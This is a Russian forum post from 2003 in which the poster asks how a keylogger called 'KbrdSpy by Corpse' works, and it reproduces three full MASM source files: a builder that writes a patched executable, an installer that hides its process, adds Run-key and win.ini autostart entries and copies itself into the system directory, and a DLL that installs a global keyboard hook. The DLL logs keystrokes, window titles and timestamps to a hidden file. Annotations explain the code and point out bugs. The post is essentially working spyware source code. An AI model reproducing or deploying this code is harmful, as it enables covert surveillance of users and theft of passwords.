

Дата: Янв 4, 2003 03:14:09

Помогите решить такую траблу:

Имеются 3 исходника: main.asm, sys98exe.asm, sys98dll.asm (хотя названия, в общем, не важны; файлы приведу ниже), а требуется мне понять,
как эти выдумщики замутили вот такую вот гадость -->
В откомпилированном виде это один EXE, но потом он сам каким-то образом мутит ещё EXE, а к нему ещё и та дллка клеится!!!

Я вот и хочу узнать, как это у них всё получается программно

ПОМОГИТЕ ПЛИИЗЗЗ!!!

main.asm

.486
.model flat,stdcall
option casemap:none

include d:\program\masm\bin\include\windows.inc
include d:\program\masm\bin\include\user32.inc
include d:\program\masm\bin\include\kernel32.inc
includelib d:\program\masm\bin\lib\user32.lib
includelib d:\program\masm\bin\lib\kernel32.lib
include d:\program\masm\bin\include\comdlg32.inc
includelib d:\program\masm\bin\lib\comdlg32.lib
include d:\program\masm\bin\include\advapi32.inc
includelib d:\program\masm\bin\lib\advapi32.lib

DlgProc PROTO :DWORD,:DWORD,:DWORD,:DWORD

; ---------------------------------------------------------------------
; main.asm data: dialog control IDs, UI strings, and the byte arrays that
; DlgProc writes into the generated file "sys98.exe".
; The Russian string literals are runtime text and are left unchanged.
; ---------------------------------------------------------------------
.const
; Dialog control identifiers compared against wParam in DlgProc.
IDC_BUTTON equ 3001
IDC_BUTTON1 equ 3008
IDC_EXIT equ 3002
IDC_EDIT equ 3005
IDC_CHECKBX equ 2021
MAXSIZE equ 26 ; byte size of buffer777

.data
DlgName db "MD",0 ; dialog resource name passed to DialogBoxParam
AppName db "KbrdSpy by Corpse тестовая версия.",0 ; message-box caption
buffer777 db MAXSIZE dup (0) ; receives the IDC_EDIT text read by DlgProc
; 4608 bytes written verbatim as the start of sys98.exe. All zeros in this
; listing; presumably the distributed build carries the assembled
; sys98exe image here -- cannot be confirmed from this page.
filepatch db 4608 dup (0) ;space for the patch
; 45-byte x86 fragment written at file offset 0F0Fh of sys98.exe:
;   C7 05 <addr32> <imm32> x3 = mov dword ptr [0040466Fh/00404673h/00404677h], imm32
;   10 x 90h                  = NOP padding (optionally overwritten with tt5)
;   E9 <rel32>                = near jmp
; DlgProc fills the three zero imm32 fields with 12 bytes of buffer777.
filepatch1 db 0C7h,05h,6Fh,46h,40h,00h,00h,00h,00h,00h,0C7h,05h,73h,46h,40h,00h,00h,00h,00h,00h,0C7h,05h,77h,46h,40h,00h,00h,00h,00h,00h,10 dup (90h), 0E9h,0C4h,84h,0FFh,0FFh
; C6 05 A4 10 40 00 75 = mov byte ptr [004010A4h], 75h (7 code bytes + 0).
; What the byte at 004010A4h controls in the target image is not visible here.
tt5 db 0C6h,05h,0A4h,10h,40h,00h,75h,0
cst2 db "sys98.exe",0 ; name of the file created by DlgProc
mess1 db "Имя файла должно быть 1-12 символов",0ah,0dh,"(Только в пробной версии)",0 ; shown when the entered text is empty or longer than 12 characters
cmplt db "Шпион создан.",0 ; shown after the file has been written
aboutmsg db "Пробная версия.",0ah,0dh,"5 августа 2002 г.",0 ; shown for IDC_BUTTON1

.data?
hFile HANDLE ? ; handle returned by _lcreat
hInstance HINSTANCE ? ; module handle of this program
.code
; Entry point of main.asm: stores the module handle, runs the modal dialog
; "MD" with DlgProc as its procedure, and exits with the dialog's result.
start:
invoke GetModuleHandle, NULL
mov hInstance,eax

invoke DialogBoxParam, hInstance, ADDR DlgName,NULL,addr DlgProc,NULL
invoke ExitProcess,eax ; eax = value returned by DialogBoxParam

; DlgProc -- dialog procedure of main.asm.
; Handles WM_COMMAND button clicks:
;   IDC_BUTTON  : reads the edit box, patches filepatch1 with the text,
;                 writes filepatch + filepatch1 to "sys98.exe", then exits.
;   IDC_EXIT    : exits the process.
;   IDC_BUTTON1 : shows the "about" message box.
; Returns TRUE for WM_COMMAND that falls through, FALSE for other messages.
DlgProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
.IF uMsg==WM_COMMAND
mov eax,wParam ; ax = control ID (low word of wParam)
.IF lParam !=0
mov edx,wParam
shr edx,16 ; dx = notification code (high word of wParam)
.if dx==BN_CLICKED
.IF ax==IDC_BUTTON
; NOTE(review): the call allows up to 200 characters while buffer777 is
; MAXSIZE (26) bytes; filepatch follows buffer777 in .data.
invoke GetDlgItemTextA,hWnd,IDC_EDIT,ADDR buffer777,200
.if eax>0ch ; more than 12 characters: reject
invoke MessageBox,NULL,ADDR mess1,ADDR AppName,MB_ICONWARNING
ret
.elseif eax==0 ; empty text: reject
invoke MessageBox,NULL,ADDR mess1,ADDR AppName,MB_ICONWARNING
ret
.endif

; Copy three dwords (12 bytes) of the entered text into the imm32 fields
; of the three "mov dword ptr [addr], imm32" stores in filepatch1
; (byte offsets 6, 16 and 26).
mov edi,offset buffer777
mov esi,offset filepatch1
add esi,6
mov edx,[edi]
mov [esi],edx
add edi,4
add esi,10
mov edx,[edi]
mov [esi],edx
add edi,4
add esi,10
mov edx,[edi]
mov [esi],edx
invoke IsDlgButtonChecked,hWnd,IDC_CHECKBX
.if eax!=BST_CHECKED
; Checkbox not checked: overwrite the first 7 NOP bytes (offset 30 of
; filepatch1) with the 7 code bytes of tt5.
add esi,4
mov ecx,7
mov edi,offset tt5
xchg edi,esi ; edi = destination in filepatch1, esi = tt5
rep movsb ; assumes the direction flag is clear
.endif
invoke _lcreat, addr cst2, 4 ; create "sys98.exe"; attribute 4 = system file per the _lcreat documentation
mov hFile,eax ; NOTE(review): the result is not checked for failure (-1)
invoke _lwrite, hFile,ADDR filepatch,4608 ; write the 4608-byte image
invoke _llseek,hFile, 0f0fh,0 ; seek to offset 0F0Fh from the start of the file
invoke _lwrite, hFile,ADDR filepatch1,45 ; overwrite 45 bytes there with the patched fragment
invoke CloseHandle,hFile
invoke MessageBox,NULL,ADDR cmplt,ADDR AppName,MB_ICONWARNING
call ExitProcess ; NOTE(review): no exit-code argument is pushed before this call
.ELSEIF ax==IDC_EXIT
call ExitProcess ; NOTE(review): no exit-code argument is pushed before this call
.ELSEIF ax==IDC_BUTTON1
invoke MessageBox,NULL,ADDR aboutmsg,ADDR AppName,MB_ICONWARNING
ret
.ENDIF
.ENDIF
.ENDIF
.ELSE
mov eax,FALSE ; message not handled
ret
.ENDIF
mov eax,TRUE
ret
DlgProc endp
end start

sys98exe.asm

.486
.model flat,stdcall
option casemap:none
include d:\program\masm\bin\include\winmm.inc
include d:\program\masm\bin\include\windows.inc
include d:\program\masm\bin\include\masm32.inc
include d:\program\masm\bin\include\user32.inc
include d:\program\masm\bin\include\kernel32.inc
include d:\program\masm\bin\include\advapi32.inc
includelib d:\program\masm\bin\lib\user32.lib
includelib d:\program\masm\bin\lib\kernel32.lib
includelib d:\program\masm\bin\lib\masm32.lib
includelib d:\program\masm\bin\lib\advapi32.lib
includelib d:\program\masm\bin\lib\winmm.lib

WinMain PROTO :DWORD,:DWORD,:DWORD,:DWORD

; ---------------------------------------------------------------------
; sys98exe.asm data. The strings below are the on-disk and registry
; artefacts this program creates, so they double as host indicators:
;   files     : sys98.exe, sys98.dll, shelzlog.txt (in the system directory)
;   registry  : HKLM\Software\Microsoft\Windows\CurrentVersion\Run, value "winsys98"
;   win.ini   : [windows] run=sys98.exe
;   window    : title "winsys98", class "sysClass"
; ---------------------------------------------------------------------
.DATA
; 10240 bytes written verbatim to sys98.dll by the startup code. All zeros
; in this listing; presumably the distributed build carries the assembled
; sys98dll image here -- cannot be confirmed from this page.
dllplace db 10240 dup (0) ; dll!
errormsg db "ERROR",0dh,0ah,0 ; line appended to the log file when a step fails
AppName db "winsys98",0 ; window title; also used for the FindWindow single-instance check
ClassName db "sysClass",0 ; window class name
fnini db "win.ini",0 ; file written by WritePrivateProfileString
kernel32 db "kernel32.dll", 0
func db "RegisterServiceProcess", 0 ; resolved dynamically via GetProcAddress
arunknm db "Software\Microsoft\Windows\CurrentVersion\Run\",0 ; autostart key opened under HKLM
znak db "winsys98",0 ; registry value name
exefile db "sys98.exe" ,0 ; registry/win.ini value data and copy target name
dllfile db "sys98.dll" ,0 ; name of the dropped DLL
logfile db "shelzlog.txt" ,0 ; log file name
slash db 5ch,0 ; "\"
IconName db "sysIcon",0 ; icon resource name
funcKEY db "CorpseProc",0 ; export looked up in sys98.dll
crps1 db "run",0 ; win.ini key
crps3 db "windows",0 ; win.ini section


.DATA?
hInstance dd ?
CommandLine dd ?
pKey dd ? ; registry key handle from RegCreateKey
d576 dd ? ; module handle of sys98.dll (LoadLibrary result)
cst2 db 400h dup(?) ; built by gll3: system directory + "\" + "shelzlog.txt"
cst8 db 400h dup(?) ; system directory + "\" + "sys98.dll"
d577 dd ? ; address of CorpseProc (GetProcAddress result)
cmd dd ? ; file handle used for log and DLL writes
hookC dd ? ; hook handle from SetWindowsHookEx
DW_SIZE EQU 4 ; not referenced in this listing
DWordSize dd ? ; not referenced in this listing
Temp dd ? ; not referenced in this listing
WinDir db 370h dup(?) ; system directory path, later extended with "sys98.exe"
cst66 db 400h dup(?) ; full path of the running module

.CODE
; Entry point of sys98exe.asm. In order, the visible code:
;   1. exits if a window titled "winsys98" already exists;
;   2. if kernel32 exports RegisterServiceProcess, calls it through raw
;      opcode bytes;
;   3. builds the paths <sysdir>\shelzlog.txt (cst2) and <sysdir>\sys98.dll (cst8);
;   4. writes run=sys98.exe to the [windows] section of win.ini;
;   5. sets value "winsys98" = "sys98.exe" under the HKLM ...\Run key,
;      appending "ERROR" to the log file if that fails;
;   6. copies its own image to <sysdir>\sys98.exe;
;   7. writes the 10240-byte dllplace array to <sysdir>\sys98.dll;
;   8. calls WinMain.
; Several instructions are emitted as raw data bytes; each is decoded in
; the comment next to it.
start:
mov [esp+4],56h ; NOTE(review): no operand size is given and the purpose is not evident from this listing
invoke FindWindow,0,addr AppName
byte 83h ; bytes 83h F8h 00h = cmp eax,0
word 00F8h
jnz exitt ; a "winsys98" window exists: another instance is running
mov d576,0
mov hookC,0
invoke GetModuleHandle, ADDR kernel32
word 0C00Bh ; bytes 0Bh C0h = or eax,eax
jz dalsh
invoke GetProcAddress, eax, ADDR func
word 0C00Bh ; bytes 0Bh C0h = or eax,eax
jz dalsh ; export missing: skip the call
; Bytes 6Ah 01h 6Ah 00h FFh D0h = push 1 / push 0 / call eax, i.e.
; RegisterServiceProcess(0, 1). On Windows 9x this registers the current
; process as a service process, which keeps it out of the Ctrl+Alt+Del list.
; NOTE(review): the value is six bytes wide and does not fit a dword as
; written; the directive may have been altered in the post.
dword 0D0FF006A016Ah
dalsh:
invoke GetSystemDirectory , addr WinDir, sizeof WinDir
invoke lstrcat,addr WinDir,addr slash
push offset WinDir
call gll3 ; cst2 += WinDir
push offset logfile
call gll3 ; cst2 += "shelzlog.txt"
invoke lstrcpy, addr cst8, addr WinDir
invoke lstrcat, addr cst8, addr dllfile ; cst8 = <sysdir>\sys98.dll
mov edi,1
cmp edi,0
je winini ; never taken: edi was just set to 1
invoke WritePrivateProfileString,ADDR crps3,ADDR crps1,ADDR exefile,ADDR fnini ; win.ini [windows] run=sys98.exe
winini:
invoke RegCreateKey, HKEY_LOCAL_MACHINE,addr arunknm, addr pKey
.IF eax == 0
invoke RegSetValueEx, pKey, addr znak, NULL, REG_SZ, addr exefile, sizeof exefile
.IF (eax != 0)
; Setting the value failed: append "ERROR" to the log file (create it if absent).
invoke _lopen, addr cst2, 1
mov cmd,eax
.IF eax == (-1)
invoke _lcreat, addr cst2, 4
mov cmd,eax
.ELSE
call ff2 ; seek to end of the existing file
.ENDIF
.IF cmd != (-1)
invoke _lwrite, cmd, addr errormsg, sizeof errormsg
invoke _lclose, cmd
.ENDIF
.ENDIF
.ELSE
; Opening the key failed: same "ERROR" logging as above.
invoke _lopen, addr cst2, 1
mov cmd,eax
.IF eax == (-1)
invoke _lcreat, addr cst2, 4
mov cmd,eax
.ELSE
call ff2
.ENDIF
.IF cmd != (-1)
invoke _lwrite, cmd, addr errormsg, sizeof errormsg
invoke _lclose, cmd
.ENDIF
.ENDIF
invoke RegCloseKey, pKey ; reached on both paths, including when RegCreateKey failed
invoke lstrcat,addr WinDir,addr exefile ; WinDir = <sysdir>\sys98.exe
invoke GetModuleFileName,NULL,addr cst66,sizeof cst66
invoke CopyFile,addr cst66,addr WinDir,FALSE ; FALSE = overwrite an existing file
invoke _lcreat, addr cst8, 0 ; create <sysdir>\sys98.dll
mov cmd,eax
.IF cmd != (-1)
invoke _lwrite, cmd, addr dllplace,10240 ; write the embedded DLL image
invoke _lclose, cmd
.ENDIF
invoke GetModuleHandle, NULL
mov hInstance,eax
invoke GetCommandLine
mov CommandLine,eax
invoke WinMain, hInstance,NULL,CommandLine, SW_SHOWDEFAULT
exitt: invoke ExitProcess,eax
; ff2 -- helper: moves the file pointer of handle `cmd` to the end of the
; file (origin 2), so the following _lwrite appends.
ff2:
invoke _llseek, cmd, 0, 2
byte 0c3h ; C3h = ret, emitted as a raw byte
byte 0cch ; CCh = int 3, not reached after the ret above
; WinMain -- registers window class "sysClass", creates a window titled
; "winsys98" and runs the message loop until GetMessage returns 0.
; No ShowWindow call appears in this listing, so the window is created
; but not explicitly shown; it is what the FindWindow check at startup
; looks for, and its WM_CREATE handler (WndProc) installs the hook.
; Returns msg.wParam.
WinMain proc hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD
LOCAL wc:WNDCLASSEX
LOCAL msg:MSG
LOCAL hwnd:HWND
LOCAL Ver: OSVERSIONINFO ; not used in this procedure
mov wc.cbSize,SIZEOF WNDCLASSEX
mov wc.style, CS_HREDRAW or CS_VREDRAW
mov wc.lpfnWndProc, OFFSET WndProc
mov wc.cbClsExtra,NULL
mov wc.cbWndExtra,NULL
push hInstance
pop wc.hInstance
mov wc.hbrBackground,COLOR_WINDOW
mov wc.lpszMenuName,NULL
mov wc.lpszClassName,OFFSET ClassName
invoke LoadIcon,hInstance,addr IconName
mov wc.hIcon,eax
mov wc.hIconSm,eax
invoke LoadCursor,NULL,IDC_ARROW
mov wc.hCursor,eax
invoke RegisterClassEx, addr wc
INVOKE CreateWindowEx,NULL,ADDR ClassName,ADDR AppName,WS_OVERLAPPEDWINDOW,500,400,100,50,NULL,NULL,hInst,NULL
mov hwnd,eax
; Standard message pump.
.WHILE TRUE
invoke GetMessage, ADDR msg,NULL,0,0
.BREAK .IF (!eax)
invoke TranslateMessage, ADDR msg
invoke DispatchMessage, ADDR msg
.ENDW
mov eax,msg.wParam
ret
WinMain endp
; WndProc -- window procedure for the "sysClass" window.
;   WM_CREATE : loads sys98.dll, resolves its export "CorpseProc" and
;               installs it with SetWindowsHookEx(2, proc, hDll, 0).
;               Hook type 2 is WH_KEYBOARD and thread id 0 requests a hook
;               for all threads on the desktop. Each failure appends
;               "ERROR" to the log file (cst2) and requests termination.
;   WM_DESTROY: frees the DLL, removes the hook, requests termination.
;   otherwise : DefWindowProc.
; NOTE(review): "PostexittMessage" is not a Win32 API name; it is presumably
; PostQuitMessage altered by a search-and-replace, so this listing would
; not assemble as posted.
WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
.IF uMsg == WM_CREATE
invoke LoadLibrary, addr dllfile
mov d576,eax
.IF (d576 ==0)
; DLL could not be loaded: log "ERROR" and quit.
invoke _lopen, addr cst2, 1
mov cmd,eax
.IF eax == (-1)
invoke _lcreat, addr cst2, 4
mov cmd,eax
.ELSE
call ff2 ; seek to end of the existing log
.ENDIF
.IF cmd != (-1)
invoke _lwrite, cmd, addr errormsg, sizeof errormsg
invoke _lclose, cmd
.ENDIF
invoke PostexittMessage,NULL
xor eax,eax
ret
.ELSE
invoke GetProcAddress, d576, addr funcKEY
mov d577,eax
.IF (d577 ==0)
; Export "CorpseProc" not found: log "ERROR" and quit.
invoke _lopen, addr cst2, 1
mov cmd,eax
.IF eax == (-1)
invoke _lcreat, addr cst2, 4
mov cmd,eax
.ELSE
call ff2
.ENDIF
.IF cmd != (-1)
invoke _lwrite, cmd, addr errormsg, sizeof errormsg
invoke _lclose, cmd
.ENDIF
invoke PostexittMessage,0
xor eax,eax
ret
.ELSE
invoke SetWindowsHookEx, 2, d577, d576, 0 ; 2 = WH_KEYBOARD, thread id 0
mov hookC, eax
.IF (hookC == 0)
; Hook installation failed: log "ERROR" and quit.
invoke _lopen, addr cst2, 1
mov cmd,eax
.IF eax == (-1)
invoke _lcreat, addr cst2, 4
mov cmd,eax
.ELSE
invoke _llseek, cmd, 0, 2 ; same seek-to-end as ff2, written inline here
.ENDIF
nop
.IF cmd != (-1)
invoke _lwrite, cmd, addr errormsg, sizeof errormsg
invoke _lclose, cmd
.ENDIF
invoke PostexittMessage,NULL
xor eax,eax
ret
.ENDIF
.ENDIF
.ENDIF
.ELSEIF uMsg == WM_DESTROY
invoke FreeLibrary, d576
invoke UnhookWindowsHookEx, hookC
invoke PostexittMessage,NULL
xor eax,eax
ret
; NOTE(review): .ELSEIF has no condition here; presumably .ELSE was meant.
.ELSEIF
invoke DefWindowProc,hWnd,uMsg,wParam,lParam
ret
.ENDIF
xor eax,eax
ret
; The three lines below follow an unconditional ret and are not reached
; by any jump visible in this listing.
push ebp
add esp,2
byte 0c3h
WndProc endp
; gll3 -- helper: appends the string whose address the caller pushed to
; the buffer cst2, i.e. lstrcat(cst2, arg).
; In:    [esp+4] = address of the string to append (consumed by lstrcat)
; Clobb: edi (holds the return address), plus whatever lstrcat clobbers
gll3:
pop edi ; take the return address off the stack
push offset cst2 ; first lstrcat argument; the caller's pushed pointer becomes the second
call lstrcat ; stdcall: removes both arguments
push edi ; put the return address back
byte 0c3h ; C3h = ret, emitted as a raw byte
END start

sys98dll.asm

.386
.model flat, stdcall
option casemap :none
include d:\program\masm\bin\include\windows.inc
include d:\program\masm\bin\include\user32.inc
include d:\program\masm\bin\include\kernel32.inc
include d:\program\masm\bin\include\masm32.inc
includelib d:\program\masm\bin\lib\user32.lib
includelib d:\program\masm\bin\lib\kernel32.lib
includelib d:\program\masm\bin\lib\masm32.lib

; ---------------------------------------------------------------------
; sys98dll.asm data: state and buffers of the keyboard hook procedure.
; Indicators visible here: log file name "shelzlog.txt" and the banner
; line "This log generated - KbrdSpy by Corpse" written at the top of a
; newly created log.
; ---------------------------------------------------------------------
.data
hc2 dd ? ; passed to CallNextHookEx; not assigned anywhere in this listing
lastkprsd db 32h dup(?) ; copy of the most recent key name
bk65 dd ? ; set to 1 once a key-down event has been recorded
dlinna dd ? ; running length of the current output line
dlinna7 dd ? ; running length of the current record; 0 means "write a new header"
timehms db "hh : mm : ss",0 ; GetTimeFormat picture
prbl db 20h,0 ; " "; not referenced in this listing
buf db 5dch dup(?) ; record being built (header + key names)
buf3 db 3e8h dup(?) ; scratch for the date and time strings
DopStr1 db 0dh,0ah,"End write ",0 ; trailer appended before each flush
DopStr2 db 76 dup (0) ; not referenced in this listing
RegValue2 db "shelzlog.txt" ,0 ; log file name
buf1 db 5dch dup(?) ; copy of buf that is written to the file
buf2 db 3e8h dup(?) ; foreground window title
comstr9 db 1024 dup (?) ; full log path: <sysdir>\shelzlog.txt
slash db 5ch,0 ; "\"
datetmy db "dd.MM.yyyy",0 ; GetDateFormat picture
cmd1 dd ? ; log file handle
dah1 db 0dh,0ah,0 ; CR LF
crpsapp db "This log generated - KbrdSpy by Corpse",0dh,0ah,0 ; banner, 40 bytes without the terminator
ctr1 db 1; :)  -- 0 makes CorpseProc jump straight to writetf; writetf sets it back to 1
dkk db 50 dup(?) ; key name returned by GetKeyNameText

.code
; DLLEntry -- DLL entry point.
;   DLL_PROCESS_ATTACH: builds the log path <sysdir>\shelzlog.txt in
;                       comstr9, clears the counters, returns TRUE.
;   DLL_PROCESS_DETACH: if any key was recorded (bk65 != 0), copies the
;                       pending record to buf1 and flushes it by calling
;                       CorpseProc with ctr1 = 0.
; Other reasons fall through to the final ret with eax unchanged.
DLLEntry proc hInstDLL:DWORD, reason:DWORD, unused:DWORD
.IF reason == DLL_PROCESS_ATTACH
invoke GetSystemDirectory , addr comstr9, sizeof comstr9
invoke rtrim, addr comstr9, addr comstr9 ; rtrim comes from masm32.lib
invoke lstrcat,addr comstr9,addr slash
invoke lstrcat, addr comstr9, addr RegValue2
mov dlinna,0
mov dlinna7,0
mov bk65,0
mov eax, TRUE
ret
.ELSEIF reason == DLL_PROCESS_DETACH
.IF (bk65 != 0)
invoke lstrcpy, addr buf1, addr buf
mov byte ptr [ctr1],0 ; makes CorpseProc branch to writetf immediately
call CorpseProc ; called without arguments; only the writetf path runs
.ENDIF
.ENDIF
ret
DLLEntry Endp
; CorpseProc -- keyboard hook procedure exported by sys98.dll (installed
; by sys98.exe with hook type 2). Parameters follow the hook-procedure
; convention: nCode0 = hook code, wParam0 = virtual-key code,
; lParam0 = keystroke flags.
; For each key-down event it appends the key name to buf; at the start
; of a record it first writes a header with date, time and the foreground
; window title. When the record counter reaches 666h the record is copied
; to buf1 and written to <sysdir>\shelzlog.txt by writetf.
; The labels writetf, ff2, ff3 and ff4 are local helpers inside this PROC.
; Helpers end in a raw C3h byte (bare ret); presumably this avoids the
; epilogue MASM generates for `ret` inside a PROC.
CorpseProc proc nCode0: DWORD, wParam0: WPARAM, lParam0: LPARAM
cmp byte ptr [ctr1],0
je writetf ; flush request from DLLEntry (ctr1 == 0)
.IF nCode0 == HC_ACTION
mov eax, lParam0
dword 2510E8C1h ; bytes C1h E8h 10h = shr eax,16; 25h starts and eax,imm32
dword 00008000h ; imm32 = 00008000h: isolates bit 31 of lParam0 (transition state)
.IF (eax == 0) ; bit clear = key is being pressed
mov bk65,1
.IF dlinna7 == 0
; Start of a new record: build "<date><time><window title>CRLF" in buf.
invoke GetForegroundWindow
.IF eax != 0
; NOTE(review): 1024 is passed as the buffer size while buf2 is 3E8h (1000) bytes.
invoke SendMessage, eax, WM_GETTEXT, 1024, addr buf2
.ENDIF
invoke GetDateFormat, NULL, NULL, NULL, addr datetmy, addr buf3, sizeof buf3
invoke lstrcpy, addr buf, addr buf3
call ff4 ; NOTE(review): ff4 seeks cmd1, which may not be an open handle at this point
invoke GetTimeFormat, NULL, TIME_FORCE24HOURFORMAT, NULL, addr timehms, addr buf3, sizeof buf3
invoke lstrcat, addr buf, addr buf3
call ff4
invoke lstrcat, addr buf, addr buf2
invoke lstrcat, addr buf, addr dah1
invoke lstrlen, addr buf
mov dlinna7, eax
.ENDIF
invoke GetKeyNameText, lParam0, addr dkk, sizeof dkk
invoke lstrcpy, addr lastkprsd, addr dkk
invoke lstrcat, addr buf, addr dkk
word 146Ah ; bytes 6Ah 14h = push 14h
mov edi,esp
add edi,4
; NOTE(review): appends whatever string lies at esp+4; the intent is not
; clear from this listing, and the pushed dword is never popped.
invoke lstrcat, addr buf, edi
invoke lstrlen, addr dkk
add dlinna, eax
add dlinna, 3
.IF dlinna >=64h ; 100 characters on the current line: start a new one
invoke lstrcat, addr buf, addr dah1
mov eax, dlinna
add dlinna7, eax
mov dlinna,0
.ENDIF
.IF dlinna7 >=666h ; record threshold reached: flush to the log file
invoke lstrcpy, addr buf1, addr buf
mov dlinna,0
mov dlinna7,0
call writetf
.ENDIF
mov eax,0 ; key-down path returns 0 without calling CallNextHookEx
ret
.ENDIF
.ENDIF
invoke CallNextHookEx, hc2 ,nCode0, wParam0, lParam0
ret
byte 0c3h ; not reached: follows an unconditional ret
; writetf -- appends the trailer to buf1 and writes buf1 to the end of the
; log file comstr9, creating the file with the banner line if it is absent.
writetf:
mov byte ptr [ctr1],1 ; re-arm normal hook processing
invoke lstrcat, addr buf1, addr DopStr1
call ff2
call ff2
invoke _lopen, addr comstr9, OF_WRITE
mov cmd1,eax
.IF eax == (-1)
invoke _lcreat, addr comstr9, 4 ; attribute 4 = system file per the _lcreat documentation
mov cmd1,eax
invoke _lwrite, cmd1, addr crpsapp,40 ; banner line
call ff4
.ELSE
call ff4 ; existing log: seek to end so the write appends
.ENDIF
.IF cmd1 != (-1)
invoke lstrlen, addr buf1
;;;
invoke _lwrite, cmd1, addr buf1, eax
invoke _lclose, cmd1
.ENDIF
; NOTE(review): this `ret` is inside the PROC, so MASM would presumably
; expand it with the procedure epilogue; when writetf is entered via
; `call writetf` that would return from CorpseProc itself -- verify.
ret
; ff2 -- appends CR LF to buf1.
ff2:
invoke lstrcat, addr buf1, addr dah1
byte 0c3h
; ff3 -- appends buf to buf1; no call to it appears in this listing.
ff3:
invoke lstrcat, addr buf1, addr buf
byte 0c3h
; ff4 -- moves the file pointer of cmd1 to the end of the file (origin 2).
ff4:
invoke _llseek, cmd1, 0, 2
byte 0c3h
CorpseProc endp
End DLLEntry

А лучше ответы мыльте мне сюда плизз :emerald@mail2k.ru

